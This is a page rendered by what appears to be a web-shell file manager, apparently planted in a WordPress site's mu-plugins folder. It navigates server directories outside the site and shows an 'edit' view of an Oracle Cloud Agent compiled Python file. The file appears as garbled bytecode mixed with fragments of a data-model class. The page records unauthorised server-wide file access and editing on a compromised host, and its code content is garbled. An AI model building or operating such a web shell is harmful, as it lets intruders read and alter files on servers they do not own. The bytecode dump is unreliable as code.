📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
golden_gate
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/golden_gate/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: deployment_diagnostic_data.pyc
a N��f.$ � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdd� Zedd� �Z e j d d� �Z ed d� �Zej dd� �Zed d� �Zej dd� �Zedd� �Z e j dd� �Z edd� �Zej dd� �Zedd� �Zej dd� �Zdd� Zdd� Zdd� ZdS ) �DeploymentDiagnosticDatazD Information regarding the deployment diagnostic collection �IN_PROGRESS� SUCCEEDED�FAILEDc K sP ddddddd�| _ dddddd d�| _d | _d | _d | _d | _d | _d | _d S )a� Initializes a new DeploymentDiagnosticData object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param namespace_name: The value to assign to the namespace_name property of this DeploymentDiagnosticData. :type namespace_name: str :param bucket_name: The value to assign to the bucket_name property of this DeploymentDiagnosticData. :type bucket_name: str :param object_name: The value to assign to the object_name property of this DeploymentDiagnosticData. :type object_name: str :param diagnostic_state: The value to assign to the diagnostic_state property of this DeploymentDiagnosticData. Allowed values for this property are: "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type diagnostic_state: str :param time_diagnostic_start: The value to assign to the time_diagnostic_start property of this DeploymentDiagnosticData. :type time_diagnostic_start: datetime :param time_diagnostic_end: The value to assign to the time_diagnostic_end property of this DeploymentDiagnosticData. :type time_diagnostic_end: datetime �str�datetime)�namespace_name�bucket_name�object_name�diagnostic_state�time_diagnostic_start�time_diagnostic_end� namespaceName� bucketName� objectName�diagnosticState�timeDiagnosticStart�timeDiagnosticEndN)� swagger_types� attribute_map�_namespace_name�_bucket_name�_object_name�_diagnostic_state�_time_diagnostic_start�_time_diagnostic_end)�self�kwargs� r"